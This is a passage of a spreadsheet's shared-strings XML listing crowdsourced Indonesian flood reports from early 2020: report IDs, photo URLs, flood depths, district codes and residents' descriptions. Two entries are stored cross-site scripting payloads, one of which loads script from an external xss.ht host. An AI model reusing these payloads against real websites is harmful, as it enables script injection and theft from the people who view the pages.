    <t>Pluit</t>
  </si>
  <si>
    <t>eef2527f-b57d-4f9c-bf34-5350776a4d81</t>
  </si>
  <si>
    <t>https://images.petabencana.id/eef2527f-b57d-4f9c-bf34-5350776a4d81.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 40, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2451", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Jalan akses disini selalu banjir jika hujan lebat, tolong drainasenya diperbaiki oleh pemerintah DKI Jln muara baru raya penjaringan</t>
  </si>
  <si>
    <t>25494bb9-d1a9-49fb-844c-0b9537d9e6c5</t>
  </si>
  <si>
    <t>https://images.petabencana.id/25494bb9-d1a9-49fb-844c-0b9537d9e6c5.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "2318", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir kembali terjadi di kawasan Jalan lingkungan 3 Rt. 13 rw. 003 Tegal Alur  Kalideres Jakarta Barat"</t>
  </si>
  <si>
    <t>Tegal Alur</t>
  </si>
  <si>
    <t>58865200-fb26-4c06-9e90-931d18a6fc74</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "92", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir di Taman Surya</t>
  </si>
  <si>
    <t>Pegadungan</t>
  </si>
  <si>
    <t>18d6cd15-4bea-49b4-b2ae-1664d4449df0</t>
  </si>
  <si>
    <t>https://images.petabencana.id/18d6cd15-4bea-49b4-b2ae-1664d4449df0.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1740", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir di sekitar pintu tol Kebon Nanas</t>
  </si>
  <si>
    <t>932790b0-33be-41d4-9e7f-477092693f0b</t>
  </si>
  <si>
    <t>https://images.petabencana.id/932790b0-33be-41d4-9e7f-477092693f0b.jpg</t>
  </si>
  <si>
    <t>Banjir Jl. Yos Sudarso no 76 , Kelurahan Sunter Jaya , Jakarta Utara</t>
  </si>
  <si>
    <t>4a0aed09-a96c-4ed5-9bbd-7b43d321a8c5</t>
  </si>
  <si>
    <t>https://images.petabencana.id/4a0aed09-a96c-4ed5-9bbd-7b43d321a8c5.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 37 }</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "1881", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>JTS</t>
  </si>
  <si>
    <t>38dc8a53-c2b4-417e-89c6-f941eedca6bf</t>
  </si>
  <si>
    <t>https://images.petabencana.id/38dc8a53-c2b4-417e-89c6-f941eedca6bf.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2425", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir sudah dimulai dari pukul 09.00 pagi, dan volume air terus meningkat</t>
  </si>
  <si>
    <t>974230fc-ae5c-4202-8ece-c621e35e95e1</t>
  </si>
  <si>
    <t>https://images.petabencana.id/974230fc-ae5c-4202-8ece-c621e35e95e1.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1714", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Kebon nanas otista III</t>
  </si>
  <si>
    <t>8bed5330-5720-48b9-a254-61c6da282242</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8bed5330-5720-48b9-a254-61c6da282242.jpg</t>
  </si>
  <si>
    <t>Genangan di Jalan DI Pandjaitan, daerah Kebon Nanas, bikin macet parah. Hati-hati untuk pengendara.</t>
  </si>
  <si>
    <t>73e18a69-5cee-4c2b-be82-43ce7ee0453e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/73e18a69-5cee-4c2b-be82-43ce7ee0453e.jpg</t>
  </si>
  <si>
    <t>Jatimulya</t>
  </si>
  <si>
    <t>Kosambi</t>
  </si>
  <si>
    <t>7357ce61-7ee7-43e2-b16f-401cb8cdd948</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 52, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Banjir daerah andir sebelum jembatan Citarum</t>
  </si>
  <si>
    <t>Andir</t>
  </si>
  <si>
    <t>Baleendah</t>
  </si>
  <si>
    <t>e60186ec-c3bd-4034-bba2-def74faa5e1a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e60186ec-c3bd-4034-bba2-def74faa5e1a.jpg</t>
  </si>
  <si>
    <t>{ "points": 2, "flood_depth": 65, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Banjir menggenangi jalam raya di dekat pintu masuk Tol Kebon Nanas</t>
  </si>
  <si>
    <t>7a3a0b09-06b5-4080-83bb-3f915d02d7e5</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7a3a0b09-06b5-4080-83bb-3f915d02d7e5.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2319", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Pegangsaan Dua</t>
  </si>
  <si>
    <t>084c758f-5b7a-46fd-8853-7f9bf5bf03c1</t>
  </si>
  <si>
    <t>https://images.petabencana.id/084c758f-5b7a-46fd-8853-7f9bf5bf03c1.jpg</t>
  </si>
  <si>
    <t>Jln prancis dadap indah</t>
  </si>
  <si>
    <t>7c897b7b-f72d-4276-b5db-964611816c47</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2496", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Genangan air di daerah Jl. Boulevard Timur, Kelapa Gading (seberang Al-Azhar Kelapa Gading)</t>
  </si>
  <si>
    <t>e294d05b-1a7c-4060-8b7f-fa67272c9b96</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e294d05b-1a7c-4060-8b7f-fa67272c9b96.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "2331", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>32adc495-9c30-4002-81d0-ea47e22ce1e3</t>
  </si>
  <si>
    <t>https://images.petabencana.id/32adc495-9c30-4002-81d0-ea47e22ce1e3.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2074", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>13414718-365c-4b92-b549-46564ee022b4</t>
  </si>
  <si>
    <t>"&gt;&lt;script src=https://xhc.xss.ht&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>a909622b-9369-4846-af99-2ca63a52046f</t>
  </si>
  <si>
    <t>"&gt;&lt;script src=https://xhc.xss.ht&gt;&lt;/script&gt;&lt;img src=x onerror=alert()&gt;</t>
  </si>
  <si>
    <t>542d54a9-0880-462b-99a3-2816b57e9ccb</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 59 }</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "344", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Kebanjiraannnnnnn</t>
  </si>
  <si>
    <t>Maphar</t>
  </si>
  <si>
    <t>Taman Sari</t>
  </si>
  <si>
    <t>ff769738-8b95-4a5c-b81e-0cef978d2d46</t>
  </si>
  <si>
    <t>Pluit bbrp titik banjir</t>
  </si>
  <si>
    <t>1921daa7-493a-4036-b184-dda79baf9cd5</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1921daa7-493a-4036-b184-dda79baf9cd5.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "1893", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir di gang jaya 8. Nambah naik air nya."</t>
  </si>
  <si>
    <t>68549bab-4a03-4ab8-afdc-4994157b81d5</t>
  </si>
  <si>
    <t>https://images.petabencana.id/68549bab-4a03-4ab8-afdc-4994157b81d5.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1932", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Sudah surut. Tapi tadi segitu</t>
  </si>
  <si>
    <t>Utan Kayu Selatan</t>
  </si>
  <si>
    <t>2e0efbfc-27ff-4390-b404-7d80dfa99df3</t>
  </si>
  <si>
    <t>https://images.petabencana.id/2e0efbfc-27ff-4390-b404-7d80dfa99df3.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "2585", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Di rmh masuk segitu apalagi d luar rmh bisa bisa sedengkul ??????</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/348162</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2020/01/24/1579856391667821409.jpg</t>
  </si>
  <si>
    <t>Hujan Berhenti, Perumahan Villa Taman Bandara Masih Banjir</t>
  </si>
  <si>
    <t>Hujan telah reda, namun banjir di beberapa wilayah di kelurahan Dadap belum juga surut. Seperti di Perumahan Villa Taman Bandara, Dadap, Tangerang ini contohnya. Banjir masih menggenang sekitar 10 CM sampai 30 CM, menurut penuturan warga sekitar selain c</t>
  </si>
  <si>
    <t>D A D A P</t>
  </si>
  <si>
    <t>994b341d-468c-4940-a9b5-975f15ba85b4</t>
  </si>
  <si>
    <t>Ketinggian bervariasi 30cm - 1 meter. Ketinggian saat ini depan desa Dayeuhkolot sekitaran 30 cm</t>
  </si>
  <si>
    <t>Dayeuhkolot</t>
  </si>
  <si>
    <t>fe7e11d3-1f9c-4cf1-95d0-adc9b8b15584</t>
  </si>
  <si>
    <t>https://images.petabencana.id/fe7e11d3-1f9c-4cf1-95d0-adc9b8b15584.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2389", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/348178</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/data/media/thumbs-pasangmata/2020/01/24/348178-1579868413300150876.mov-03.jpg</t>
  </si>
  <si>
    <t>Jalan Kelapa Hybrida Timur Masih Terendam Air</t>
  </si>
  <si>
    <t>Genangan air masih merendam Jl. Kelapa Hybrida Timur, Kelapa Gading. Kondisi lalu lintas saat ini masih lancar.</t>
  </si>
  <si>
    <t>88e80040-cda5-461a-8421-546b7fb24c53</t>
  </si>
  <si>
    <t>Banjir langganan apabila hujan lebat didaerah PT Kahatex, Rancaekek</t>
  </si>
  <si>
    <t>Mangunarga</t>
  </si>
  <si>
    <t>Cimanggung</t>
  </si>
  <si>
    <t>Sumedang</t>
  </si>
  <si>
    <t>7ace2a37-c315-4588-a4e0-5f7e8ee863e1</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7ace2a37-c315-4588-a4e0-5f7e8ee863e1.jpg</t>
  </si>
  <si>
    <t>Banjir berturut turut belum surut</t>
  </si>
  <si>
    <t>Sumbersari</t>
  </si>
  <si>
    <t>Ciparay</t>
  </si>
  <si>
    <t>b549efc8-009f-449f-a527-9196fc3c1286</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b549efc8-009f-449f-a527-9196fc3c1286.jpg</t>
  </si>
  <si>
    <t>banjir makin besar tolong bantuannya sampe skrng dari pemerintah belum ada bantuan listrik juga mati jadi susah buat nyari makanan.</t>
  </si>
  <si>
    <t>Tegalluar</t>
  </si>
  <si>
    <t>Bojongsoang</t>
  </si>
  <si>
    <t>768607cd-86d8-4d49-89f4-a2cc236cc3d7</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 75 }</t>
  </si>
  <si>
    <t>Banjir di depan BBPK-Polsek Dayeuhkolot</t>
  </si>
  <si>
    <t>Citeureup</t>
  </si>
  <si>
    <t>4b075854-65f9-46d1-b0c9-73267bf7823c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/4b075854-65f9-46d1-b0c9-73267bf7823c.jpg</t>
  </si>
  <si>
    <t>Pamulang Barat</t>
  </si>
  <si>
    <t>a4bde5a9-0af5-49dd-a435-218f13b6c2f5</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a4bde5a9-0af5-49dd-a435-218f13b6c2f5.jpg</t>
  </si>
  <si>
    <t>Dua kali banjir di awal tahun</t>
  </si>
  <si>
    <t>01eb0b76-7b5f-401f-b5ee-4b82e9adc15d</t>
  </si>
  <si>
    <t>Cijantung #hujan</t>
  </si>
  <si>
    <t>Pasir Gunung Selatan</t>
  </si>
  <si>
    <t>Cimanggis</t>
  </si>
  <si>
    <t>9a146832-7821-4a14-86ae-fff797eb9859</t>
  </si>
  <si>
    <t>https://images.petabencana.id/9a146832-7821-4a14-86ae-fff797eb9859.jpg</t>
  </si>
  <si>
    <t>{ "points": -1, "flood_depth": 60, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "2398", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>21.44: Banjir sekitar 50-60 cm di Jln H. Kamang Bawah, Pondok Labu, Jaksel .........(Toni) #ElshintaWeekend https://t.co/Ei8oG7amEo #banjir</t>
  </si>
  <si>
    <t>c9be871a-8cbd-4647-87b0-37e5a759b7ad</t>
  </si>
  <si>
    <t>Bukit pamulang indah kembali banjir</t>
  </si>
  <si>
    <t>bee49bd6-84cd-4cdd-9ce8-40fa73485e16</t>
  </si>
  <si>
    <t>Banjir di daerah dayeuhkolot air nya mulai tinggi mohon bantuanyaa terimakasih</t>
  </si>
  <si>
    <t>0532452a-ae9f-41ba-992e-ba24fa1df073</t>
  </si>
  <si>
    <t>https://images.petabencana.id/0532452a-ae9f-41ba-992e-ba24fa1df073.jpg</t>
  </si>
  <si>
    <t>Daerah Jakarta Selatan, Lebak Bulus 5 akibat kiriman dari bogor</t>
  </si>
  <si>
    <t>029e19e2-b308-495c-b521-08443fee7131</t>
  </si>
  <si>
    <t>https://images.petabencana.id/029e19e2-b308-495c-b521-08443fee7131.jpg</t>
  </si>
  <si>
    <t>Tinggi banjir berbeda beda. Jalan masuk komplek lebih tinggi dibanding jalan keluar.</t>
  </si>
  <si>
    <t>d665e598-8a5b-4e32-b625-93fecd75ad93</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d665e598-8a5b-4e32-b625-93fecd75ad93.jpg</t>
  </si>
  <si>
    <t>Sudah Naik terus.. Kompleks pondok Hijau ciputat"</t>
  </si>
  <si>
    <t>Pisangan</t>
  </si>
  <si>
    <t>bddc34c1-c9b6-4019-a93f-2374918a1bd0</t>
  </si>
  <si>
    <t>https://images.petabencana.id/bddc34c1-c9b6-4019-a93f-2374918a1bd0.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 66, "report_type": "flood" }</t>
  </si>
  <si>
    <t>sepaha bahkan sepinggang orang dewasa, mobil truk bahkan sampai pintunya</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/348259</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2020/01/27/1580083379167005340.jpg</t>
  </si>
  <si>
    <t>Diguyur Hujan 2 Hari Lalu, Jalan Ini Masih Tergenang Air</t>
  </si>
  <si>
    <t>Hujan sudah dua hari yang lalu, Jalan Kincan masih tergenang air</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/348294</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/data/media/thumbs-pasangmata/2020/01/27/348294-1580115418105360793.mp4-03.jpg</t>
  </si>
  <si>
    <t>Pemotor Tak Bisa Lewati Jl Wr Soepratman karena Derasnya Air</t>
  </si>
  <si>
    <t>Akibat hujan deras yang mengguyur sebagian wilayah kota Purworejo sejak pukul 14.00 WIB. Membuat beberapa jalan kota tergenang air. Salah satunya di Jalan Wr Soepratman ini, beberapa pengendara motor roda dua tidak dapat melewatinya karena derasnya air.</t>
  </si>
  <si>
    <t>Sinduadi</t>
  </si>
  <si>
    <t>Mlati</t>
  </si>
  <si>
    <t>Sleman</t>
  </si>
  <si>
    <t>Daerah Istimewa Yogyakarta</t>
  </si>
  <si>
    <t>5c16d26f-ad0f-4690-a29f-85b6ce038200</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5c16d26f-ad0f-4690-a29f-85b6ce038200.jpg</t>
  </si>
  <si>
    <t>Jl industri dari sapan raya</t>
  </si>
  <si>
    <t>cea538cd-9028-4227-99c8-1b70415b0cb7</t>
  </si>
  <si>
    <t>https://images.petabencana.id/cea538cd-9028-4227-99c8-1b70415b0cb7.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 13 }</t>
  </si>
  <si>
    <t>Banjir di sekolah masuk ke kelas wkwk</t>
  </si>
  <si>
    <t>Giriawas</t>
  </si>
  <si>
    <t>Cikajang</t>
  </si>
  <si>
    <t>Garut</t>
  </si>
  <si>
    <t>8f920c73-921c-40c1-a017-ccd21bc192e4</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8f920c73-921c-40c1-a017-ccd21bc192e4.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1346", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Kuningan Timur</t>
  </si>
  <si>
    <t>dedc7a55-c834-489c-9ce2-58cdc7ccc6a2</t>
  </si>
  <si>
    <t>https://images.petabencana.id/dedc7a55-c834-489c-9ce2-58cdc7ccc6a2.jpg</t>
  </si>
  <si>
    <t>Uji coba kirim laporan banjir</t>
  </si>
  <si>
    <t>a2a2b85d-0840-4088-8c9e-d1639903e3af</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a2a2b85d-0840-4088-8c9e-d1639903e3af.jpg</t>
  </si>
  <si>
    <t>Tolong di sini ada banjirr</t>
  </si>
  <si>
    <t>f6edf6ec-6527-4ef6-a129-426fb8b96493</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f6edf6ec-6527-4ef6-a129-426fb8b96493.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "510", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Butuh evakuasi balita dan lansia</t>
  </si>
  <si>
    <t>793960e2-ee20-4a71-b06f-d3e4a0a98f7a</t>
  </si>
  <si>
    <t>Simo Hilir banjir kemungkinan karena jalanan nya menurun jadi kena arus air dari Kupang Jaya</t>
  </si>
  <si>
    <t>Simomulyo</t>
  </si>
  <si>
    <t>Suko Manunggal</t>
  </si>
  <si>
    <t>4f8b796b-458c-440e-9be4-585411fc5d94</t>
  </si>
  <si>
    <t>uinsa banjir hampir se mata kaki</t>
  </si>
  <si>
    <t>Jemur Wonosari</t>
  </si>
  <si>
    <t>Wonocolo</t>
  </si>
  <si>
    <t>a33c0136-f147-4bf8-9867-f8ef82d60f9e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a33c0136-f147-4bf8-9867-f8ef82d60f9e.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 26 }</t>
  </si>
  <si>
    <t>Banjir daerah Bakso Rindu Malam, Surabaya. Banyak kendaraan mogok karena banjir. Hujan deras dari jam 17.00 sampe 18.09 tidak berenti</t>
  </si>
  <si>
    <t>Sawunggaling</t>
  </si>
  <si>
    <t>Wonokromo</t>
  </si>
  <si>
    <t>7e81f04c-8cb4-488f-8ec4-6b79132361ef</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7e81f04c-8cb4-488f-8ec4-6b79132361ef.jpg</t>
  </si>
  <si>
    <t>Banjir di daerah imam bonjol surabaya</t>
  </si>
  <si>
    <t>Merdeka</t>
  </si>
  <si>
    <t>Sumur Bandung</t>
  </si>
  <si>
    <t>0c6be57f-e3eb-40ad-8e19-0258e977fb03</t>
  </si>
  <si>
    <t>https://images.petabencana.id/0c6be57f-e3eb-40ad-8e19-0258e977fb03.jpg</t>
  </si>
  <si>
    <t>Airlangga</t>
  </si>
  <si>
    <t>3ba47e55-fb72-4efd-a09f-2b6070db9db9</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3ba47e55-fb72-4efd-a09f-2b6070db9db9.jpg</t>
  </si>
  <si>
    <t>Sawitan</t>
  </si>
  <si>
    <t>Mungkid</t>
  </si>
  <si>
    <t>Magelang</t>
  </si>
  <si>
    <t>1b8f3215-c348-4f9b-8e4f-532ae54f7663</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 15 }</t>
  </si>
  <si>
    <t>Banjir akhirnya menghampiri surabaya hahaha</t>
  </si>
  <si>
    <t>Ngagelrejo</t>
  </si>
  <si>
    <t>3e2b1983-38be-4d42-af05-52242db99878</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3e2b1983-38be-4d42-af05-52242db99878.jpg</t>
  </si>
  <si>
    <t>Macet di jalan darmo arah ke wonokromo</t>
  </si>
  <si>
    <t>Darmo</t>
  </si>
  <si>
    <t>9955a82a-02af-400a-ace7-2a8bb7a60b7a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/9955a82a-02af-400a-ace7-2a8bb7a60b7a.jpg</t>
  </si>
  <si>
    <t>Baratajaya</t>
  </si>
  <si>
    <t>000c3ac2-1ade-4ded-b063-d97df4e539ee</t>
  </si>
  <si>
    <t>https://images.petabencana.id/000c3ac2-1ade-4ded-b063-d97df4e539ee.jpg</t>
  </si>
  <si>
    <t>Jagir</t>
  </si>
  <si>
    <t>cc47b55e-dd15-4522-ab72-14687b66a8ff</t>
  </si>
  <si>
    <t>Banjir di daerah A.Yani depan Royal Plaza sampai Sekolah Khotijah. Ketinggian hampir 50cm</t>
  </si>
  <si>
    <t>a6d5639a-45a7-45c1-bb7c-a8a9c6034f33</t>
  </si>
  <si>
    <t>Genangan terjadi di depan pom medaeng sampai simpang 3 waru, bahkan sampai masuk ke terminal purabaya</t>
  </si>
  <si>
    <t>Medaeng</t>
  </si>
  <si>
    <t>Waru</t>
  </si>
  <si>
    <t>Sidoarjo</t>
  </si>
  <si>
    <t>f6440009-f967-44ac-beac-b110cf4480b1</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f6440009-f967-44ac-beac-b110cf4480b1.jpg</t>
  </si>
  <si>
    <t>Ketintang</t>
  </si>
  <si>
    <t>Gayungan</t>
  </si>
  <si>
    <t>c6f57d91-00c5-4942-a742-0d5d3512a80a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c6f57d91-00c5-4942-a742-0d5d3512a80a.jpg</t>
  </si>
  <si>
    <t>Banjir setinggi betis orang dewasa, intensitas hujan gerimis. Sudah 2 jam banjir masih blm surut juga.</t>
  </si>
  <si>
    <t>6d6bd23e-81eb-42bf-a32a-4edcd2a04eaa</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6d6bd23e-81eb-42bf-a32a-4edcd2a04eaa.jpg</t>
  </si>
  <si>
    <t>Pradahkali Kendal</t>
  </si>
  <si>
    <t>Dukuh Pakis</t>
  </si>
  <si>
    <t>c598cd8b-6668-44ee-b8a8-27164ccc1018</t>
  </si>
  <si>
    <t>Banjir dan macet di pucang anom dari arah ngagel sampai perempatan Kertajaya di kedua lajur</t>
  </si>
  <si>
    <t>Kertajaya</t>
  </si>
  <si>
    <t>df651691-f94b-4a7e-aa7b-4e8701efee51</t>
  </si>
  <si>
    <t>https://images.petabencana.id/df651691-f94b-4a7e-aa7b-4e8701efee51.jpg</t>
  </si>
  <si>
    <t>aa7487dc-5cf2-4506-afaa-60926165fa18</t>
  </si>
  <si>
    <t>Banjir di daerah ngagel dan pucang belum sempat disedot oleh tim pdam</t>
  </si>
  <si>
    <t>64794eb0-f8db-4c4d-88b0-0f36f9abbee1</t>
  </si>
  <si>
    <t>Banjir depan RSI</t>
  </si>
  <si>
    <t>1f8a937d-a415-4481-97a0-e1e10c646951</t>
  </si>
  <si>
    <t>Wilayah ketintang surabaya dan sekitarnya rawan banjir apabila intensitas hujan tinggi</t>
  </si>
  <si>
    <t>42f7ab8e-8549-4e47-a773-59300ab9ae61</t>
  </si>
  <si>
    <t>https://images.petabencana.id/42f7ab8e-8549-4e47-a773-59300ab9ae61.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 53 }</t>
  </si>
  <si>
    <t>Banjir dan macet dari sepanjang jalan wonokromo sampai rsi a.yani??</t>
  </si>
  <si>
    <t>6dd6a049-e874-445d-bf26-09d71e9c1c6a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6dd6a049-e874-445d-bf26-09d71e9c1c6a.jpg</t>
  </si>
  <si>
    <t>banjir 50cm</t>
  </si>
  <si>
    <t>e212f97c-f2e4-47aa-8b00-d713b7919734</t>
  </si>
  <si>
    <t>Perumahan duta garden banjir</t>
  </si>
  <si>
    <t>Jurumudi Baru</t>
  </si>
  <si>
    <t>Benda</t>
  </si>
  <si>
    <t>11119959-3a3f-425e-8bbf-2380157bfb13</t>
  </si>
  <si>
    <t>Hujan kurleb2 jam air menggenang setingi 30cm</t>
  </si>
  <si>
    <t>Simomulyo Baru</t>
  </si>
  <si>
    <t>e42e1ab4-6845-408e-b56c-bc88f2b65f86</t>
  </si>
  <si>
    <t>Banjir akibat hujan lebat semalaman, titik banjir berada di daerah komplek pergudangan bandara mas</t>
  </si>
  <si>
    <t>Teluk Naga</t>
  </si>
  <si>
    <t>Teluknaga</t>
  </si>
  <si>
    <t>a430c5ef-7faf-4294-b347-5edf8e8369cb</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a430c5ef-7faf-4294-b347-5edf8e8369cb.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 58 }</t>
  </si>
  <si>
    <t>Banjir dari jam 6 malam sampai sekarang (8.19 malam)</t>
  </si>
  <si>
    <t>94ad5b4e-1b65-458c-aa8e-e127b1a62305</t>
  </si>
  <si>
    <t>https://images.petabencana.id/94ad5b4e-1b65-458c-aa8e-e127b1a62305.jpg</t>
  </si>
  <si>
    <t>banjir surabaya barat, raya sukomanunggal</t>
  </si>
  <si>
    <t>Ketabang</t>
  </si>
  <si>
    <t>01c0596e-6fdc-4b10-ae05-fd6bd296470f</t>
  </si>
  <si>
    <t>Banjir yang diakibatkan hujan teros meneros</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/348516</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2020/02/02/15805791811771843030.jpg</t>
  </si>
  <si>
    <t>Tim BPBD Kota Madiun Memantau Debit Air di Sungai Piring</t>
  </si>
  <si>
    <t>Tim BPBD Kota Madiun, dini hari ini, Minggu (02/02/2020), terus pantau banjir dan peningkatan debit air sungai piring, di Jembatan Bok Malang, kelurahan Pilangbango, kecamatan kartoharjo Kota Madiun.</t>
  </si>
  <si>
    <t>Pilangbango</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/348515</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2020/02/02/1580578109507348262.jpg</t>
  </si>
  <si>
    <t>Hujan hinga Larut Malam Mengakibatkan Banjir di Pilangbango</t>
  </si>
  <si>
    <t>Pasca hujan deras sabtu (01/02/2020) malam, dini hari ini, minggu (02/02/2020) banjir menggenangi kelurahan Pilangbango, kecamatan Kartoharjo, Kota Madiun.</t>
  </si>
  <si>
    <t>Kelun</t>
  </si>
  <si>
    <t>a710fb3e-b34d-4c4a-9849-9b2cc993ca2c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a710fb3e-b34d-4c4a-9849-9b2cc993ca2c.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 18 }</t>
  </si>
  <si>
    <t>Saya cek aplikasi pantau banjir, pompa yang di operasi kan hanya sedikit, pompa air di sunter tidak ada yang nyala. Tolong pompanya dinyalak</t>
  </si>
  <si>
    <t>c225192a-c877-46bf-a87f-c0e7157e0337</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c225192a-c877-46bf-a87f-c0e7157e0337.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2251", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir daerah sunter</t>
  </si>
  <si>
    <t>4383dd79-83a7-4bc6-87c3-bbbc79100066</t>
  </si>
  <si>
    <t>https://images.petabencana.id/4383dd79-83a7-4bc6-87c3-bbbc79100066.jpg</t>
  </si>
  <si>
    <t>Pompa air di sunter belum ada yang nyala, air tambah naik dari tadi. Mohon pompa air sunter di nyalakan semua</t>
  </si>
  <si>
    <t>35faa3c2-5477-4609-be9a-c44b8a6fa0c5</t>
  </si>
  <si>
    <t>https://images.petabencana.id/35faa3c2-5477-4609-be9a-c44b8a6fa0c5.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 62 }</t>
  </si>
  <si>
    <t>Banjir sekitar 60cm di Jl Agung Jaya 7 dan Agung jaya 8 . Sunter , Jakut</t>
  </si>
  <si>
    <t>4bd7f60b-b246-46f8-b84c-a93e79801d72</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 42 }</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "68", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Masih dapat dilalui oleh mobil tetapi tidak dapat dilalui oleh motor.</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/348520</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2020/02/02/15806020592138416221.jpg</t>
  </si>
  <si>
    <t>Hati-Hati! Ada Genangan 20 Cm di Jalan Imam Bonjol Cibitung</t>
  </si>
  <si>
    <t>Jalan Imam Bonjol Cibitung Tergenang Air Setinggi 20cm Pagi Ini</t>
  </si>
  <si>
    <t>Sukadanau</t>
  </si>
  <si>
    <t>Cikarang Barat</t>
  </si>
  <si>
    <t>a2856513-e83a-43bf-944a-c83ba90e3977</t>
  </si>
  <si>
